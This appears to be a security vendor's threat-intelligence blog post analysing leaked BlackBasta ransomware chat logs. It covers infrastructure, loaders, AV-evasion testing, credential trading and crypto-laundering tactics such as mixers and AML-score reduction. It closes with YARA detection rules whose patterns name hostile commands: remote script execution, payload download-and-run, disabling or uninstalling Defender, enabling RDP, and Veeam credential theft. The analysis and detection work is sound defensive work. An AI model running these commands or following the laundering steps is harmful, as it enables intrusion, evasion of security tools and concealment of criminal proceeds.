Oops! Something went wrong while submitting the form.
Inside the BlackBasta Leak: A Rare Look Into Ransomware Operations
On February 11, 2025, an individual operating under the alias “ExploitWhispers” leaked a Matrix chat involving assessed affiliates of the BlackBasta ransomware group. In this blog, we break down the key takeaways from the chat logs and share our analysis—along with custom detection rules based on the insights uncovered.
Key Intelligence from the Leaked Chat Logs
Some of the IP addresses identified in the leak are linked to a known compromise set associated with the threat actor tracked as “Water Barghest.” This group’s botnet is believed to have compromised over 20,000 IoT devices by leveraging vulnerabilities found through publicly available internet scan databases—ultimately converting those devices into proxies. According to a TrendMicro report, several of these IPs have also been used by both advanced persistent threat (APT) groups and cybercriminals, either knowingly or unknowingly.
According to the leaked chat we can see 3 IP’s hosted by Hetzner used as a proxy.
From an external perspective, activity linked to the group was first observed in late November 2023 by Proofpoint, which identified the use of Latrodectus malware in phishing campaigns. This activity declined toward the end of 2023 and into January 2024, before intensifying again in March 2024.
Figure 1 : Infrastructure map
From an internal perspective, we observe several correlations with the timeline outlined in Proofpoint’s analysis of these IOCs. In late 2023, chat logs show that @usernamegg shared a newly signed malware sample with the team, packaged in a ZIP file named drs1312_signed.zip. Their objective was to bypass antivirus and EDR solutions, though they encountered certain limitations. The discussions included strategies for evading detection, such as abusing rundll32.exe to load malicious DLLs or using JavaScript and VBScript files as loaders.
By March 2024, the team had deployed new builds and conducted tests within their own infrastructure, notably using avcheck[.]net to evaluate malware detectability. By June 2024, they began utilizing SOCKS proxies to further obfuscate their operations.
They often sell and buy credentials from private marketplaces for their initial access phase.
Figure 2 : discussion about credential selling between actors
Following an article shared by @usernamegg we can identify some credentials including IP’s linked to Darkgate and Pikabot activity by the messages between members of the group.
Figure 3 : Discussion about loaders
Based on the chat logs we can tell that they all have defined roles with @usernamegg as their leader
Figure 4 : organization map
We assess with medium confidence the organizational chart presented in Figure 4. For additional context, we recommend reviewing an alternative visual representation of BlackBasta’s structure provided by Flare[1].
The Identification of Tramp has been made by LeMagIT a french news website that explained his story based on their internal historic[2]. While the observed infrastructure may be shared among multiple actors, it also shows notable correlations with groups tracked by Proofpoint as TA577 and TA578.
We assess with moderate confidence that TA577 has been active since 2021 and exhibits several similarities to the indicators identified in the leaked chat logs. These include the use of Cobalt Strike from IP address 108.181.132[.]118, as well as the deployment of Latrodectus and IcedID malware—both of which align with patterns observed earlier in this analysis.
TA578, meanwhile, is closely associated with botnet-based operations involving SSLoad and Bumblebee malware—key components within the broader botnet ecosystem. As noted previously, infrastructure reuse through open proxies is a common tactic among affiliates and developers, further supporting these connections.
We also observe some activities linked with Pikabot manipulation added with the infrastructure containing IP’s that deliver Pikabot.
Figure 5 : Pikabot tests
The usage of an IP that belongs to proton66 with a tool called Brutus has been mentioned as well, it seems to be a tool for performing bruteforce tasks from “45.140.17[.]23”.
Figure 6 : Brutus tool usage
BlackBasta’s Cybercrime Economy: Tactics and Monetization Techniques
This team offers a broad range of services related to malware development and offensive cyber operations, driven primarily by financial gain. Their offerings include FUD (Fully Undetectable) loaders, digital certificates, initial access brokerage, botnet sales, pre-configured server setups, and deployment of the BlackBasta ransomware. Affiliates primarily transact using cryptocurrencies such as Bitcoin, Tether, and Monero.
Figure 7 : Financial scheme
To evade detection during cryptocurrency transactions, the group follows a set of operational security practices, including:
Routinely changing IP addresses via SOCKS proxies when converting Monero to Tether.
Creating multiple cryptocurrency wallets, each with unique seed phrases, to prevent clustering by blockchain analytics tools.
Using AMLbot to assess the risk score of Bitcoin addresses—if a score exceeds 70–80%, it indicates a higher likelihood of triggering anti-money laundering (AML) alerts. To reduce this score, they leverage BitcoinBridge in combination with a mixer, effectively obfuscating the transaction trail.
Conducting test transactions of $500 with high-risk Bitcoin (above 80% AML score) to verify whether specific exchanges will accept the funds.
Figure 8 : money laundering scheme
Internal Policies and Threat Actor Behavior Revealed
The leaked chat provides confirmation of internal policies regarding target selection, which align with earlier analysis by LeMagIT. Notably, the individual known as “gg,” also referred to as “Tramp,” was previously reported to have bribed FSB and GRU agents in exchange for protection. However, following his arrest, his relationship with local authorities appears to have shifted significantly.
Figure 9 : Directives from @usernamegg
We can also notice some discussions about local authorities issues.
Figure 10 : Discussion about the local authorities
Final Assessment: What the BlackBasta Leak Tells Us About Modern Ransomware Tactics
Based on the contents of the leaked JSON file, the Matrix chat reveals that BlackBasta affiliates maintain deep ties to the botnet ecosystem. The infrastructure leveraged by these ransomware actors—such as proxies and virtual private servers (VPS)—has been widely reused across both public and private forums, enabling a range of malicious activities from system compromise to laundering illicit gains.
While the identity and intent of the leaker remain unknown, the data appears to be incomplete, with records ending on September 28, 2024. Nonetheless, the leak provides valuable insight into the operational tactics, organizational structure, and monetization strategies of the BlackBasta group. For technical defenders, the annex includes a set of YARA rules derived from our analysis to assist in threat detection and mitigation.
Are you prepared to respond if a breach like this targets your organization?
At Kudelski Security, our Incident Response Services are designed to help you quickly detect, contain, and recover from cyberattacks—minimizing damage and restoring confidence. Reach out to our team to build or strengthen your response strategy today.
rule Blackbasta_regsvr_LOLBAS_usage { meta: author = “Kudelski security” description = “This rule detects the usage of regsvr.exe to execute remote SCT scripts with scrobj.dll, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://lolbas-project.github.io/lolbas/Binaries/Regsvr32” strings: $executable = “regsvr” nocase $argument1 = “/s” nocase $argument2 = “.sct” nocase $argument3 = “/scrobj.dll” nocase condition: $executable and $argument1 and $argument2 and $argument3 }
Blackbasta_msiexec_LOLBAS_usage
rule Blackbasta_msiexec_LOLBAS_usage { meta: author = “Kudelski security” description = “This rule detects the usage of msiexec.exe to remove binaries by their code product, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://lolbas-project.github.io/lolbas/Binaries/Msiexec” strings: $executable = “msiexec.exe” nocase $argument1 = “/x” nocase $argument2 = /{[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}}/ condition: $executable and $argument1 and $argument2 }
Blackbasta_Bitsadmin_LOLBAS_usage
rule Blackbasta_Bitsadmin_LOLBAS_usage { meta: author = “Kudelski security” description = “This rule detects the usage of bitsadmin.exe to download a file, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin” strings: $executable = “bitsadmin” nocase $argument1 = “/transfer” nocase $argument2 = “/download” nocase $argument3 = “/priority” nocase condition: $executable and $argument1 and $argument2 and ($argument3 or true) }
Blackbasta_wscript_LOLBAS_usage
rule Blackbasta_wscript_LOLBAS_usage { meta: author = “Kudelski security” description = “This rule detects the usage of wscript.exe to execute JS files binaries, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://lolbas-project.github.io/lolbas/Binaries/Wscript” strings: $executable = “wscript” nocase $file = “.js” nocase condition: $executable and $file }
Blackbasta_dotnet_usage
rule Blackbasta_dotnet_usage { meta: author = “Kudelski security” description = “This rule detects the usage of donet to authenticate within an ldap server, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/” strings: $executable = “dotnet” nocase $executableexe = “dotnet.exe” nocase $argument1 = “-ldaplogin” nocase $argument2 = “-controller” condition: ($executable or $executableexe) and $argument1 and $argument2 }
Blackbasta_OneDriveStandaloneUpdater_LOLBAS_usage
rule Blackbasta_OneDriveStandaloneUpdater_LOLBAS_usage { meta: author = “Kudelski security” description = “This rule detects the usage of OneDriveStandaloneUpdater.exe to download files, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/” strings: $executable = “psexec” nocase $argument1 = “OneDriveStandaloneUpdater.exe” nocase condition: $executable and $argument1 }
Blackbasta_Esentutl_LOLBAS_usage
rule Blackbasta_Esentutl_LOLBAS_usage { meta: author = “Kudelski security” description = “This rule detects the usage of Esentutl.exe to download malicious files, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://lolbas-project.github.io/lolbas/Binaries/Esentutl” strings: $executable = “Esentutl” nocase $executableexe = “Esentutl.exe” nocase $argument1 = “/y” nocase $argument2 = “/d” nocase condition: ($executable or $executableexe) and $argument1 and $argument2 }
Blackbasta_AppInstaller_LOLBAS_usage
rule Blackbasta_AppInstaller_LOLBAS_usage { meta: author = “Kudelski security” description = “This rule detects the usage of ms-appInstaller to download malicious files, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://lolbas-project.github.io/lolbas/Binaries/AppInstaller” strings: $executable = “ms-appinstaller” nocase $argument1 = “source=http” nocase $argument2 = “source=https” nocase condition: $executable and ($argument1 or $argument2) }
Blackbasta_netsh_enable_RDP_LOLBAS_usage
rule Blackbasta_netsh_enable_RDP_LOLBAS_usage { meta: author = “Kudelski security” description = “This rule detects the usage of netsh to modiffy firewall rules and authorize RDP connections, it has been found on a chat leak of Blackbasta ransomware.” references1 = “Blackbasta chat leaks” references2 = “https://lolbas-project.github.io/lolbas/Binaries/Netsh” strings: $executable = “netsh” nocase $argument1 = “firewall set rule” nocase $argument2 = “Remote Desktop” nocase $argument3 = “enable=yes” nocase condition: $executable and $argument1 and $argument2 and $argument3 }
rule Blackbasta_Remote_desktop_enable_via_HKLM_RDP_Tcp_add { meta: author = “Kudelski security” description = “This rule detects the enablement of RDP via reg.exe, it has been found on a chat leak of Blackbasta ransomware.” references1 = “Blackbasta chat leaks” references2 = “https://lolbas-project.github.io/lolbas/Binaries/Reg/” strings: $executable1 = “reg” nocase $executableexe = “reg.exe” nocase $argument1 = “add” nocase $argument2 = “HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\” nocase $argument3 = “/v” nocase $argument4 = “UserAuthentication” nocase $argument5 = “/t REG_DWORD /d 0 /f” nocase condition: ($executable or $executableexe) and $argument1 and $argument2 and $argument3 and $argument4 and $argument5 }
Blackbasta_veeam_ps1_script
rule Blackbasta_veeam_ps1_script { meta: author = “Kudelski security” description = “This rule detects the usage of the script “Veeam-Get-Creds.ps1″ that is used to get a quick credential access by doing a privilege escalation on Veeam” reference1 = “Blackbasta chat leaks” reference2 = “https://osintteam.blog/the-ultimate-black-basta-chat-leak-part-2-veeam-confluence-8b766c2182ac” strings: $platform = “Win” nocase $eventID = “4688” nocase $process = “*powershell.exe” nocase $CommandLine1 = “*Veeam-Get-Creds.ps1*” $commandline2 = “*Get-VBR*” nocase condition: $platform and $eventID and $process and ($CommandLine1 or $commandline2) }
Blackbasta_dropping_payload
rule Blackbasta_dropping_payload { meta: author = “Kudelski security” description = “This rule detects the usage of Invoke-WebRequest to drop a malicious file, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://osintteam.blog/the-ultimate-black-basta-chat-leak-part-2-veeam-confluence-8b766c2182ac” strings: $argument1 = “Invoke-WebRequest” nocase $argument2 = “-Uri” nocase $argument3 = “-OutFile” nocase $argument4 = “Start-Process” nocase condition: $argument1 and $argument2 and $argument3 and $argument4 }
Blackbasta_disable_realtime_monitoring
rule Blackbasta_disable_realtime_monitoring { meta: author = “Kudelski security” description = “This rule detects the usage of powershell to disable real time monitoring, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://osintteam.blog/the-ultimate-black-basta-chat-leak-part-2-veeam-confluence-8b766c2182ac” strings: $argument1 = “-command” nocase $argument2 = “Set-MpPreference -DisableRealtimeMonitoring 1” nocase condition: $argument1 and $argument2 }
Blackbasta_uninstall_defender
rule Blackbasta_uninstall_defender { meta: author = “Kudelski security” description = “This rule detects the usage of powershell to uninstall windows defender, it has been found on a chat leak of Blackbasta ransomware.” reference1 = “Blackbasta chat leaks” reference2 = “https://osintteam.blog/the-ultimate-black-basta-chat-leak-part-2-veeam-confluence-8b766c2182ac” strings: $argument1 = “Uninstall-WindowsFeature” nocase $argument2 = “-Name Windows-Defender” nocase condition: $argument1 and $argument2 }
.webp)
.webp)
